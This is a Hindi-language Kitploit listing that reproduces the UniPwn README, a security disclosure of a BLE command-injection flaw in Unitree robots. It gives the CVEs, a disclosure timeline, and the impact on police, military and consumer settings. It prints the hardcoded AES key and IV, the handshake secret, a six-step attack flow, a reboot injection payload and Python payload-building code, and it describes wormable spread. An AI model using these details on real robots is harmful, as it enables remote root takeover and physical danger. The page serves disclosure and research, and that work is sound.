Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
UniPwn — Unitree रोबोटों के लिए BLE एक्सप्लॉइट फ्रेमवर्क: हार्डकोडेड AES कुंजियों के माध्यम से कमांड इंजेक्शन रिमोट टेकओवर, पेलोड इंजेक्शन और वर्मेबल प्रसार को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/bin4ry/unipwn
ब्लूटूथ सुरक्षाशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगहार्डवेयर और IoT सुरक्षापेलोड डेवलपमेंट
GitHubbin4ry/unipwn

UniPwn

Unitree रोबोटों के लिए BLE एक्सप्लॉइट फ्रेमवर्क: हार्डकोडेड AES कुंजियों के माध्यम से कमांड इंजेक्शन रिमोट टेकओवर, पेलोड इंजेक्शन और वर्मेबल प्रसार को सक्षम बनाता है।

रिपॉजिटरी देखें
3987210 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Unitree रोबोट BLE सेवा कमांड इंजेक्शन विश्लेषण

Meme

लेखक: Bin4ry उर्फ Andreas Makris [[email protected]]
सह-लेखक: h0stile उर्फ Kevin Finisterre
योगदानकर्ता: legion1581 उर्फ Konstantin Severov theroboverse से, इंजेक्शन के लिए पेलोड को ठीक करने में मदद की और इसे पूरी तरह से काम करने वाले PoC के साथ सिद्ध किया 🙂 धन्यवाद दोस्त, यह एक महत्वपूर्ण योगदान था, बहुत सराहनीय!

दिनांक: सितंबर 20, 2025

CVEs

CVE-2025-35027
CVE-2025-60017
CVE-2025-60250
CVE-2025-60251

पेपर

इस रेपो का शोध एक पेपर में शामिल है जो Unitree G1 का व्यवस्थित सुरक्षा मूल्यांकन प्रस्तुत करता है। हालाँकि, शोध का प्रभाव केवल G1 तक सीमित नहीं है, बल्कि Go2 श्रृंखला से शुरू होने वाली पूरी Unitree उत्पाद लाइन पर है। नए Unitree बॉट्स का कोड Go2 कोडबेस का एक फोर्क प्रतीत होता है, जिससे विशेष रूप से Go1 वंश और अन्य pre-Go2 Unitree बॉट्स प्रभावित नहीं हैं। हालाँकि, सभी आधुनिक वेरिएंट इस समय प्रभावित हैं। Unitree ने अभी तक उत्पाद लाइन में सटीक प्रभाव को स्पष्ट करने वाला कोई एडवाइज़री जारी नहीं किया है।

पेपर का लिंक: https://arxiv.org/abs/2509.14139
शीर्षक: Cybersecurity AI: Humanoid Robots as Attack Vectors
लेखकगण: Víctor Mayoral-Vilches, Andreas Makris, Kevin Finisterre```bibtex @misc{mayoralvilches2025cybersecurityaihumanoidrobots, title={Cybersecurity AI: Humanoid Robots as Attack Vectors}, author={Víctor Mayoral-Vilches and Andreas Makris and Kevin Finisterre}, year={2025}, eprint={2509.14139}, archivePrefix={arXiv}, primaryClass={cs.CR}, url={https://arxiv.org/abs/2509.14139}, }

root@kitploit:~
विषय सूची
=================

* [Unitree Robot BLE Service Command Injection Analysis](#unitree-robot-ble-service-command-injection-analysis)
   * [अवलोकन](#overview)
   * [BLE सेवा खोज](#ble-service-discovery)
   * [प्रोटोकॉल का रिवर्स इंजीनियरिंग](#reverse-engineering-the-protocol)
   * [निर्देश 1: "सुरक्षित" हैंडशेक](#instruction-1-the-secure-handshake)
   * [निर्देश 2: सीरियल नंबर प्राप्त करें](#instruction-2-get-serial-number)
   * [निर्देश 3: WiFi मोड प्रारंभ करें](#instruction-3-initialize-wifi-mode)
   * [निर्देश 4: SSID सेट करें](#instruction-4-set-ssid)
   * [निर्देश 5: पासवर्ड सेट करें](#instruction-5-set-password)
   * [निर्देश 6: देश कोड सेट करें (द ट्रिगर!)](#instruction-6-set-country-code-the-trigger)
   * [WiFi सेटिंग थ्रेड](#the-wifi-setting-thread)
   * [कमजोर फ़ंक्शन: कमांड इंजेक्शन](#the-vulnerable-function-command-injection)
   * [हमले की प्रक्रिया का सार](#attack-flow-summary)
   * [वर्मेबल खतरा](#the-wormable-threat)
   * [प्रूफ ऑफ कॉन्सेप्ट](#proof-of-concept)
   * [वास्तविक दुनिया में तैनाती और प्रभाव](#real-world-deployment--impact)
      * [वर्तमान तैनाती](#current-deployments)
      * [प्रभाव मूल्यांकन](#impact-assessment)
      * [कानून प्रवर्तन और सैन्य प्रभाव](#law-enforcement--military-impact)
      * [कॉर्पोरेट वातावरण](#corporate-environments)
      * [उपभोक्ता प्रभाव](#consumer-impact)
      * [वर्मेबल प्रसार](#wormable-propagation)
   * [तकनीकी विवरण](#technical-details)
      * [BLE सेवा वास्तुकला](#ble-service-architecture)
      * [क्रिप्टोग्राफ़िक पैरामीटर](#cryptographic-parameters)
      * [पैकेट संरचना](#packet-structure)
   * [सीखे गए सबक](#lessons-learned)
   * [प्रकटीकरण समयरेखा](#disclosure-timeline)
      * [आपके प्रमुख G1, Go2 और अन्य बॉट्स में एक और सुरक्षा समस्या की रिपोर्ट करने का पहला और अंतिम प्रयास](#first-and-last-attempt-to-report-another-security-issue-in-your-flagship-g1-and-go2-and-other-bots)
   * [अस्वीकरण](#disclaimer)
   * [सुरक्षा समस्याओं का एक पैटर्न](#a-pattern-of-security-issues)
   * [निष्कर्ष](#conclusion)
   * [कानूनी सूचना](#legal-notice)
   * [योगदान](#contributing)
   * [लाइसेंसिंग, और इन फ़ाइलों तक पहुंच](#licensing-and-access-to-these-files)


---

## अवलोकन

Unitree रोबोटिक प्लेटफ़ॉर्म पर अपने सुरक्षा अनुसंधान के दौरान, हमने Bluetooth Low Energy (BLE) Wi-Fi कॉन्फ़िगरेशन इंटरफ़ेस में एक गंभीर कमज़ोरी की खोज की। यह कमज़ोरी कई Unitree रोबोट मॉडलों को प्रभावित करती है, जिनमें Go2, G1, H1 और B2 श्रृंखला के रोबोट शामिल हैं, आज [20. सितम्बर 2025] के नवीनतम फर्मवेयर तक।

**🎯 यह ह्यूमनॉइड रोबोटों को लक्षित करने वाला पहला सार्वजनिक रूप से प्रकट शोषण है!**

इस कमज़ोरी में कई सुरक्षा समस्याएँ संयुक्त हैं: हार्डकोडेड क्रिप्टोग्राफ़िक कुंजियाँ, तुच्छ प्रमाणीकरण बायपास, और बिना सैनिटाइज़ किया गया कमांड इंजेक्शन। जो चीज़ इसे विशेष रूप से चिंताजनक बनाती है वह यह है कि यह पूरी तरह से **वर्मेबल** है - संक्रमित रोबोट BLE रेंज में अन्य रोबोटों को स्वचालित रूप से समझौता कर सकते हैं। यह कमज़ोरी हमलावर को डिवाइस पर पूर्ण नियंत्रण लेने की अनुमति देती है।

हमने जुलाई में क्रिप्टोग्राफ़िक कुंजियाँ प्रकाशित कीं [ट्वीट का लिंक](https://x.com/Bin4ryDigit/status/1950566849072005304) लेकिन Unitree ने परवाह नहीं की।

आइए इस कमज़ोरी को खोजने और उसका शोषण करने के तकनीकी विवरण में गहराई से उतरें।

## BLE सेवा खोज

पहला कदम रोबोटों द्वारा उजागर की गई BLE सेवाओं की पहचान करना था। सभी प्रभावित Unitree मॉडल Wi-Fi कॉन्फ़िगरेशन के लिए एक कस्टम BLE सेवा उजागर करते हैं:```
Service UUID: 0000ffe0-0000-1000-8000-00805f9b34fb
Write Characteristic: 0000ffe2-0000-1000-8000-00805f9b34fb  
Notify Characteristic: 0000ffe1-0000-1000-8000-00805f9b34fb

प्रोटोकॉल का रिवर्स इंजीनियरिंग

रिवर्स इंजीनियरिंग के माध्यम से, हमने पाया कि रोबोट एक रिसीव मैनेजर लागू करता है जो एन्क्रिप्टेड BLE पैकेटों को प्रोसेस करता है। हमें यह मिला:

पैकेट डिक्रिप्शन

रिसीव मैनेजर पहले हार्डकोडेड AES पैरामीटर का उपयोग करके आने वाले पैकेटों को डिक्रिप्ट करता है:```python AES_KEY = "df98b715d5c6ed2b25817b6f2554124a" AES_IV = "2841ae97419c2973296a0d4bdfe19a4f" Mode: AES-CFB128

root@kitploit:~
![Receive manager](https://assets.kitploit.com/production/public/readmes/49064/6f3e6d08a4d69e657e9d8d17f957dbaedf979c3629a109846390030c9fa783d2.png)

डिक्रिप्शन के बाद, पैकेट्स को switch-case संरचना में निर्देश कोड के आधार पर संसाधित किया जाता है। आइए प्रत्येक निर्देश की जाँच करें:

## निर्देश 1: "सुरक्षित" हैंडशेक

![Handshake instruction](https://assets.kitploit.com/production/public/readmes/49064/0edbe2419cb07586658a3811f515ab09e09dc9c5f204d557bfe6e1ee3f5243d5.png)

हैंडशेक "प्रमाणीकरण" हास्यास्पद रूप से सरल है:

![Handshake implementation](https://assets.kitploit.com/production/public/readmes/49064/7a0d0de452924790859fcf34ab81b103d531d8c9ffc970674ae6b5317448ce3e.png)

![Authentication flag](https://assets.kitploit.com/production/public/readmes/49064/88bb3cc9c24ac7b81d9c610b48755e677d4c026abd6b80f6ea2f585e576a94a2.png)

मूल रूप से, रोबोट जाँचता है कि डिक्रिप्टेड पैकेट में हैंडशेक गुप्त के रूप में स्ट्रिंग `"unitree"` शामिल है या नहीं, फिर `valid_incoming_user` फ़्लैग को 1 पर सेट करता है। यही पूरा "प्रमाणीकरण" तंत्र है!

## निर्देश 2: सीरियल नंबर प्राप्त करें

![Get serial number](https://assets.kitploit.com/production/public/readmes/49064/0eb1d8510ee261c31014befe56f453dbbbeefdef7c154021cf2a15697146a6bc.png)

यह निर्देश जाँचता है कि उपयोगकर्ता "प्रमाणित" है या नहीं (अर्थात्, फ़्लैग सेट है), फिर सीरियल नंबर फ़ाइल को पढ़ता है और उसे लौटाता है। यह पुष्टि करता है कि हमारे पास सिस्टम तक पहुँच है।

## निर्देश 3: WiFi मोड प्रारंभ करें

यह निर्देश WiFi सेटिंग्स को प्रारंभ करता है। उपयोगकर्ता AP मोड (subcommand = 1) या STA मोड (subcommand = 2) के बीच चयन कर सकते हैं:

![WiFi mode initialization](https://assets.kitploit.com/production/public/readmes/49064/774940d74f07bf14ad7168261b143ee4bd619388a7bed90e1ec4b2081bb876a2.png)

## निर्देश 4: SSID सेट करें

यह निर्देश WiFi SSID संग्रहीत करता है। यह हमारा पहला इंजेक्शन बिंदु है:

![Set SSID](https://assets.kitploit.com/production/public/readmes/49064/ed93fccd5c5f255d940911ca1f4e37fb93ca15a41fbfbdc1bcda8135feb091a9.png)

## निर्देश 5: पासवर्ड सेट करें

SSID कमांड के समान, यह WiFi पासवर्ड संग्रहीत करता है। एक और इंजेक्शन बिंदु:

![Set password](https://assets.kitploit.com/production/public/readmes/49064/18363e90f73974cd259ca2feb44c4241f7f1c7cbd375c5a8c6d14d89578d2a50.png)

## निर्देश 6: कंट्री कोड सेट करें (ट्रिगर!)

यह निर्देश WiFi कंट्री कोड सेट करता है और, महत्वपूर्ण रूप से, `WifiSettingThreadFunction` को ट्रिगर करता है:

![Set country code](https://assets.kitploit.com/production/public/readmes/49064/01b5ea5104d45aa2ed8f3aec8f76c58ee45d55d09bd93b0a025c4fec169db46e.png)

जब निर्देश 6 निष्पादित होता है, यह WiFi कॉन्फ़िगरेशन थ्रेड शुरू करता है, जो हमें कमजोर फ़ंक्शंस की ओर ले जाता है।

## WiFi सेटिंग थ्रेड

WiFi कॉन्फ़िगरेशन थ्रेड, मोड के आधार पर `restart_wifi_ap` या `restart_wifi_sta` को कॉल करता है:

![WiFi setting thread](https://assets.kitploit.com/production/public/readmes/49064/d2955ec5a5489cd5550768a02be5b4c7110e3317ea72af67a8e479d810c3d7b5.png)

## कमजोर फ़ंक्शन: कमांड इंजेक्शन

`restart_wifi_ap` (`hostapd_restart.sh`) और `restart_wifi_sta` (`wpa_supplicant_restart.sh`) दोनों फ़ंक्शंस एक ही कमजोर पैटर्न का पालन करते हैं।  
यहाँ पुख्ता सबूत है (`restart_wifi_ap` फ़ंक्शन को उदाहरण के रूप में उपयोग करते हुए):

![Vulnerable function](https://assets.kitploit.com/production/public/readmes/49064/67dbffbba6799ed151b97d74c725e8abf33c527a44614446a8637b01a2acb3d2.png)

फ़ंक्शन यह कमांड बनाता है:```bash
sudo sh /unitree/module/network_manager/upper_bluetooth/hostapd_restart.sh "wifi_ssid wifi_pass"

यह कमांड बिना किसी इनपुट सत्यापन या सैनिटाइज़ेशन के सीधे system() को पास कर दिया जाता है!

यदि हम wifi_ssid या wifi_pass में से किसी को नियंत्रित करते हैं, तो हम अपने स्वयं के कमांड इंजेक्ट कर सकते हैं। एक सरल पेलोड जैसे:```bash ";$(reboot -f);#

root@kitploit:~
रोबोट को रीबूट करने के लिए पर्याप्त होगा। लेकिन हम और भी बहुत कुछ कर सकते हैं...

## हमले के प्रवाह का सारांश

यहाँ पूरा हमला क्रम दिया गया है जिसे हमें निष्पादित करना है:

1. निर्देश 1 के डेटा के रूप में AES-एन्क्रिप्टेड पेलोड "unitree" भेजें
2. get_sn कमांड भेजें और एक्सेस सत्यापित करने के लिए प्रतिक्रिया को डिक्रिप्ट करें
3. init_wifi को सबकमांड 1 (AP) या 2 (STA) के साथ भेजें
4. wifi_ssid को अपने इंजेक्शन पेलोड जैसे `";$(reboot -f);#` पर सेट करें
5. wifi_pass को किसी मनमाने मान पर सेट करें
6. कमजोर थ्रेड को ट्रिगर करने के लिए वाई-फ़ाई कंट्री कोड सेट करें

यदि सब कुछ ठीक रहा, तो रोबोट को हमारे इंजेक्ट किए गए कमांड को रूट विशेषाधिकारों के साथ निष्पादित करना चाहिए।

## वर्मेबल खतरा

इस भेद्यता को विशेष रूप से खतरनाक बनाने वाली बात इसकी **वर्मेबल** प्रकृति है। इस विधि से हम यह कर सकते हैं:

- रूट विशेषाधिकारों के साथ मनमाने कमांड चलाएँ
- पेलोड इंजेक्शन के माध्यम से मैलवेयर स्थानांतरित और निष्पादित करें  
- रोबोटों को हमलावर-नियंत्रित वाई-फ़ाई नेटवर्क से कनेक्ट होने के लिए मजबूर करें
- आत्म-प्रसार करने वाला रोबोट मैलवेयर बनाएँ जो आस-पास के रोबोटों को संक्रमित करता है

एक संक्रमित रोबोट आसानी से BLE रेंज में अन्य Unitree रोबोटों को स्कैन कर सकता है और स्वचालित रूप से उन्हें समझौता कर सकता है, जिससे एक रोबोट बॉटनेट बनता है जो उपयोगकर्ता के हस्तक्षेप के बिना फैलता है।

## प्रूफ ऑफ कॉन्सेप्ट

हमने एक संपूर्ण प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट फ्रेमवर्क विकसित किया है जो इस भेद्यता को प्रदर्शित करता है। एक्सप्लॉइट में शामिल हैं:

- पायथन-आधारित BLE स्कैनर और एक्सप्लॉइट फ्रेमवर्क
- Android APK (पहले 5 सितंबर 2025 को Slack चैनल में परीक्षकों के साथ PWD-संरक्षित zip के माध्यम से साझा किया गया)
- कई पूर्व-परिभाषित पेलोड (SSH सक्षम करना, सिस्टम रीबूट, कस्टम कमांड)
- सभी प्रभावित रोबोट मॉडलों के लिए समर्थन (Go2, G1, H1, B2, ...)

हमारे कार्यशील एक्सप्लॉइट के प्रमुख घटक:```python
AES_KEY = bytes.fromhex("df98b715d5c6ed2b25817b6f2554124a")
AES_IV = bytes.fromhex("2841ae97419c2973296a0d4bdfe19a4f")
HANDSHAKE_CONTENT = "unitree"

def build_pwn(cmd):
    return f'";$({cmd});#'

एंड्रॉइड ऐप

कृपया ध्यान दें, कमांड भेजे जाने के बाद रोबोट का पूर्ण रिबूट होने में 10-15 सेकंड लग सकते हैं ;)

वास्तविक दुनिया में तैनाती और प्रभाव

वर्तमान तैनातियाँ

Unitree रोबोट पहले से ही महत्वपूर्ण वास्तविक दुनिया के परिदृश्यों में तैनात किए जा रहे हैं, जिससे यह भेद्यता विशेष रूप से चिंताजनक हो जाती है:

कानून प्रवर्तन: नॉटिंघमशायर पुलिस वर्तमान में Unitree रोबोट का परीक्षण कर रही है सशस्त्र प्रतिक्रिया परिदृश्यों के लिए, जिनमें शामिल हैं:

  • सशस्त्र घेराबंदी और बंधक वार्ता
  • भवन खोज और खतरनाक क्षेत्र की टोह
  • थर्मल इमेजिंग और 3D मैपिंग ऑपरेशन
  • मूक ऑपरेशन जहाँ ड्रोन बहुत शोरगुल वाले हों

सैन्य अभियान: Unitree रोबोट चीन की PLA द्वारा उपयोग किए जा रहे हैं सैन्य अनुप्रयोगों के लिए, जिससे रक्षा अभियानों के लिए महत्वपूर्ण सुरक्षा निहितार्थ उत्पन्न होते हैं।

प्रभाव आकलन

इस भेद्यता के निहितार्थ काफी गंभीर हैं:

कानून प्रवर्तन और सैन्य प्रभाव

  • परिचालन सुरक्षा: समझौता किए गए पुलिस/सैन्य रोबोट ऑपरेटरों के खिलाफ घुमाए जा सकते हैं
  • खुफिया जानकारी एकत्र करना: हमलावर संवेदनशील परिचालन फुटेज और संचार तक पहुँच सकते हैं
  • मिशन समझौता: महत्वपूर्ण अभियानों में तोड़फोड़ की जा सकती है या खुफिया जानकारी लीक हो सकती है
  • बल गुणन: दुश्मन तत्व सुरक्षा रोबोटों को निगरानी साधनों में बदल सकते हैं

कॉर्पोरेट वातावरण

  • जासूसी: रोबोट बातचीत रिकॉर्ड कर सकते हैं, दस्तावेज़ चुरा सकते हैं, या सुविधाओं का नक्शा बना सकते हैं
  • तोड़फोड़: विनिर्माण रोबोटों को दोष उत्पन्न करने के लिए प्रोग्राम किया जा सकता है
  • नेटवर्क पिवट: समझौता किए गए रोबोट कॉर्पोरेट नेटवर्क में प्रवेश बिंदु बन जाते हैं

उपभोक्ता प्रभाव

  • गोपनीयता का उल्लंघन: घरेलू रोबोट परिवारों की जासूसी कर सकते हैं
  • शारीरिक सुरक्षा: दुर्भावनापूर्ण नियंत्रण रोबोटों को खतरनाक व्यवहार करने का कारण बन सकता है
  • रैनसमवेयर: भुगतान होने तक रोबोटों को बंधक बनाकर रखा जा सकता है

वर्मेबल प्रसार

  • स्व-प्रसारित मैलवेयर पूरे रोबोट बेड़े को संक्रमित कर सकता है
  • कोई उपयोगकर्ता इंटरैक्शन प्रसार के लिए आवश्यक नहीं
  • महत्वपूर्ण अवसंरचना रोबोटों को हथियार बनाया जा सकता है

तकनीकी विवरण

BLE सेवा आर्किटेक्चर

  • सेवा UUID: 0000ffe0-0000-1000-8000-00805f9b34fb
  • राइट कैरेक्टरिस्टिक: 0000ffe2-0000-1000-8000-00805f9b34fb
  • नोटिफाई कैरेक्टरिस्टिक: 0000ffe1-0000-1000-8000-00805f9b34fb

क्रिप्टोग्राफिक पैरामीटर

  • एल्गोरिदम: AES-CFB128
  • कुंजी: df98b715d5c6ed2b25817b6f2554124a (हार्डकोडेड, सभी डिवाइसों में समान)
  • IV: 2841ae97419c2973296a0d4bdfe19a4f (हार्डकोडेड, सभी डिवाइसों में समान)

पैकेट संरचना```

Encrypted([0x52, length, instruction, data, checksum])

root@kitploit:~
## सीखे गए सबक

यह शोध कई महत्वपूर्ण सुरक्षा सिद्धांतों पर प्रकाश डालता है:

- **हार्डकोडेड कुंजियों का कभी उपयोग न करें:** हर डिवाइस के पास अद्वितीय क्रिप्टोग्राफ़िक सामग्री होनी चाहिए
- **गहराई में सुरक्षा:** सुरक्षा की कई परतें विफलता के एकल बिंदुओं को रोकती हैं  
- **इनपुट सत्यापन:** हमेशा उपयोगकर्ता इनपुट को साफ़ करें, विशेषकर सिस्टम कॉल से पहले
- **सुरक्षा परीक्षण:** नियमित पेनिट्रेशन परीक्षण इन समस्याओं को जल्दी पकड़ सकता है

## प्रकटीकरण समयरेखा

हमने शुरू में इस भेद्यता के संबंध में Unitree के साथ जिम्मेदार प्रकटीकरण का प्रयास किया:

- **बग मिला:** बग 14 अप्रैल, 2025 को Andreas Makris (Bin4ry) द्वारा पाया गया और Kevin Finisterre (h0stile) तथा Konstantin Severov (legion1581) के साथ Slack DM में चर्चा की गई।
![भेद्यता की खोज](https://assets.kitploit.com/production/public/readmes/49064/9d9707ff936b690e30416d5cf42ead01dc28265e712c8a31feff66d73e170aeb.png)
- **PoC विकसित:** 25 अप्रैल, 2025 को Konstantin Severov Andreas के गलत पेलोड को ठीक करने और इंजेक्शन के लिए एक सही कार्यशील पेलोड तैयार करने में सक्षम थे। पहला PoC अस्तित्व में आया।
![भेद्यता की खोज](https://assets.kitploit.com/production/public/readmes/49064/a4a549e1370470c91325c1cf3319b76756f5a798fa33eedc27bde3b639c8b802.png)
- **असुरक्षित BLE मिला**: Konstantin द्वारा इंजेक्शन भेद्यता की पुष्टि करने के बाद Andreas ने BLE के लिए हार्डकोडेड कुंजियाँ और कमज़ोर प्रमाणीकरण पाया।
- **प्रारंभिक संपर्क:** Unitree के सुरक्षा और समर्थन चैनलों को कई ईमेल भेजे गए
- **संचार समस्याएँ:** लेखकों में से एक (Andreas Makris) को बिना स्पष्टीकरण के बार-बार ईमेल श्रृंखलाओं से हटा दिया गया
- **कोई प्रतिक्रिया नहीं:** Unitree ने सुरक्षा मुद्दों को संबोधित करने में कोई सार्थक भागीदारी या रुचि नहीं दिखाई
- **परिणाम:** कोई स्वीकृति या सुधार समयरेखा प्रदान नहीं की गई

Unitree की प्रतिक्रिया की कमी और सुरक्षा मुद्दों में स्पष्ट अरुचि को देखते हुए, **Andreas Makris ने भविष्य की भेद्यताओं के लिए Unitree के साथ निजी प्रकटीकरण के प्रयासों को बंद करने का निर्णय लिया है**। खोजी गई कोई भी अतिरिक्त सुरक्षा समस्या विक्रेता को पूर्व सूचना दिए बिना सार्वजनिक रूप से प्रकट की जाएगी।

यह निर्णय सुरक्षा मामलों पर रचनात्मक रूप से जुड़ने की Unitree की प्रदर्शित अनिच्छा को दर्शाता है, विशेष रूप से कानून प्रवर्तन और सैन्य संदर्भों में उनकी तैनाती को देखते हुए यह चिंताजनक है।

### अपने प्रमुख G1, और Go2, और अन्य बॉट्स में एक और सुरक्षा समस्या की रिपोर्ट करने का पहला, और अंतिम प्रयास 
(Kevin Finisterre द्वारा शुरू किया गया)

- **14 मई, 2025** — [LinkedIn](https://www.linkedin.com/posts/kevin-finisterre-6431069a_fyi-unitree-robotics-is-being-given-an-opportunity-activity-7328446278852407296-qZB4) और [GitHub issue #126](https://github.com/unitreerobotics/unitree_ros/issues/126) के माध्यम से प्रकटीकरण संपर्क का प्रयास किया गया, इसके बावजूद कि Unitree वर्षों से *हमारे*, और हमारे शोध सहयोगियों के अन्य रिपोर्ट प्रयासों को अनदेखा कर रहा है।
-  
  *“अपने प्रमुख G1, और Go2, और अन्य बॉट्स में एक और सुरक्षा समस्या की रिपोर्ट करने का पहला, और अंतिम प्रयास”* शीर्षक वाला ईमेल इन्हें भेजा गया:  
  Tony Yang <[email protected]>, <[email protected]>, <[email protected]>, Laikago <[email protected]>, <[email protected]>, <[email protected]>, <[email protected]>, Xing <[email protected]>, XMath <[email protected]>, <[email protected]>, <[email protected]>, <[email protected]>, <[email protected]>
- Unitree ने तुरंत भविष्य में एक संभावित बाउंटी प्रोग्राम का सुझाव दिया, लेकिन यह उस समय एक समयपूर्व चर्चा थी।

- **28–29 मई, 2025** — सुरक्षा के प्रति Unitree की *गंभीरता* की सामान्य कमी पर दो सप्ताह की चर्चा के बाद, प्रयास के प्रतीक के रूप में `[email protected]` बनाया गया।
- 
  *“अगले कदम... re: Unitree G1 में गंभीर भेद्यता की रिपोर्ट करना”* शीर्षक वाले ईमेल ने प्रकटीकरण प्रथाओं की कमी को उजागर किया, Darknavy और पिछली रिपोर्टों को अनदेखा किया, और या तो डिबग बिल्ड के साथ व्यक्तिगत डेमो या लोनर बॉट (जैसा Unitree प्रभावशाली लोगों को भेजता है) का सुझाव दिया। ICRA में मिलने के प्रस्ताव सहित दोनों को अस्वीकार कर दिया गया।  

- **8 जून, 2025** — Unitree ने जवाब दिया: “Go1 ‘Zhexi' से संबंधित एक पैच पहले ही अप्रैल में ऑनलाइन हो चुका है” लिंक <https://www.unitree.com/download/go1> के साथ, और कहा “Github केवल रिपॉजिटरी चलाने की समस्याओं के लिए है। इसलिए साइबर सुरक्षा के लिए, हम अब के तरीकों का उपयोग करने का सुझाव देते हैं।” जवाब कम होते गए।  

- **14–26 जून, 2025** — MIT Cheetah लाइसेंस प्राप्त कोड की पारदर्शिता पर दबाव डाला; जो एन्क्रिप्शन रूटीन का उपयोग करने और उधार लिए गए कोड को अस्पष्ट करने के लिए उनके linux सबसिस्टम इंस्टेंस तक नियंत्रित पहुँच के विपरीत है।
- जवाब 26 जून को आया: *“मेरे देर से जवाब देने के लिए खेद है। मैं भूला नहीं हूँ। बस और समय चाहिए।”*
- इसी समय के आसपास Unitree ने सुरक्षा कर्मचारियों के लिए एक नौकरी की सूचना पोस्ट की। [नौकरी की सूचना](https://m.zhipin.com/web/common/security-check.html?seed=F0HDtXiugDFyEi4Ap0g8%2FTu2hnxkObxC1s2HV5XA8%2Fw%3D&name=8955eed0&ts=1757704720826&callbackUrl=%2Fjob_detail%2F8f6b34a1ca755b4f03Fz2tq7EFVU.html&srcReferer)

- **18 जुलाई, 2025** — मौन और प्रकटीकरण सीमाओं पर बातचीत में आगे की प्रगति की कमी के कारण *“तोoooo क्या हम यहाँ समाप्त हैं? क्योंकि मैं यहाँ समाप्त होने वाला हूँ….”* शीर्षक वाला ईमेल भेजा गया।  

- **20 जुलाई, 2025** — Unitree ने स्वीकार किया कि हमारे पास “G1 ज्ञात भेद्यताएँ” हैं, लेकिन दावा किया कि हमारे कथित निष्कर्षों को सुधारों के साथ संबोधित करने के लिए "पूर्ण सिस्टम पुनरावृत्ति की आवश्यकता होती है जिसमें *तिमाहियों या वर्षों लगते हैं,”* और एक आगामी सार्वजनिक सुरक्षा पोर्टल को एक मील के पत्थर के रूप में इंगित किया।  

- **25 जुलाई, 2025** — Unitree ने R1 मार्केटिंग शुरू की। उसके बाद, कोई और संचार प्राप्त नहीं हुआ।
- सार्वजनिक रूप से प्रकट करने का निर्णय लिया गया, और Unitree को अपनी समयरेखा पर इसे सुलझाने दिया गया। नई खोजों के लिए आगे प्रकटीकरण प्रयास नहीं किए जाएँगे।

- **2 सितंबर, 2025** - Unitree ने 2025 की चौथी तिमाही के लिए आगामी IPO में US$7B IPO मूल्यांकन लक्ष्य की घोषणा की।

## अस्वीकरण

⚠️ **चेतावनी:** यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। ऐसे उपकरणों पर उपयोग न करें जिनके आप स्वामी नहीं हैं।

## सुरक्षा समस्याओं का एक पैटर्न

यह भेद्यता एक पृथक घटना नहीं है। हमारे द्वारा किए गए पिछले शोध ने Unitree की सुरक्षा प्रथाओं में चिंताजनक पैटर्न उजागर किए हैं:

**CVE-2025-2894:** [शोधकर्ताओं ने पहले Go1 श्रृंखला के रोबोटों में एक बैकडोर खोजा](https://takeonme.org/cves/cve-2025-2894/), जिसे Unitree ने बाद में "बचा हुआ कोड" होने का दावा किया। हालाँकि, जैसा कि हमने Go1 रिपोर्ट में उल्लेख किया, चाहे जानबूझकर बैकडोर हो या लापरवाह प्रोग्रामिंग, दोनों परिदृश्य एक ऐसी कंपनी का संकेत देते हैं जो सुरक्षा को प्राथमिकता नहीं देती है।

अब, रोबोटों की अगली पीढ़ी (Go2, G1, H1, B2) में, हम वही मौलिक सुरक्षा विफलताएँ देखते हैं: हार्डकोडेड कुंजियाँ, तुच्छ प्रमाणीकरण, और असुरक्षित सिस्टम कॉल। यह बताता है कि **Unitree ने पिछली सुरक्षा समस्याओं से सीख नहीं ली है** और गंभीर भेद्यताओं वाले उत्पाद भेजना जारी रखता है।

पैटर्न स्पष्ट है:
- **Go1 श्रृंखला:** छिपे हुए बैकडोर (CVE-2025-2894)
- **DarkNavy अज्ञात रिपोर्ट** "GeekPwn 2022 में, हमने... जिम्मेदार प्रकटीकरण के लिए Unitree से संपर्क किया (लेकिन कोई प्रतिक्रिया नहीं मिली)"
- **Go2/G1/H1/B2 श्रृंखला:** BLE के माध्यम से कमांड इंजेक्शन (यह शोध)

कानून प्रवर्तन और सैन्य संदर्भों में रोबोट तैनात करने वाली कंपनी के लिए, सुरक्षा उपेक्षा का यह स्तर अस्वीकार्य है।

## निष्कर्ष

हार्डकोडेड क्रिप्टोग्राफ़िक कुंजियों, तुच्छ प्रमाणीकरण बायपास और कमांड इंजेक्शन का संयोजन व्यापक शोषण के लिए एक आदर्श तूफान पैदा करता है। इस भेद्यता की वर्मेबल प्रकृति इसे कई रोबोटों वाले वातावरण में विशेष रूप से खतरनाक बनाती है।

सुरक्षा मुद्दों के Unitree के रिकॉर्ड और महत्वपूर्ण कानून प्रवर्तन और सैन्य परिदृश्यों में उनकी तैनाती को देखते हुए, इन प्रणालीगत सुरक्षा विफलताओं को संबोधित करने के लिए तत्काल कार्रवाई की आवश्यकता है।

हमने जिम्मेदार प्रकटीकरण प्रथाओं का पालन किया है और इन मुद्दों को संबोधित करने के लिए Unitree के साथ काम कर रहे हैं। यह शोध केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।

---

## कानूनी सूचना

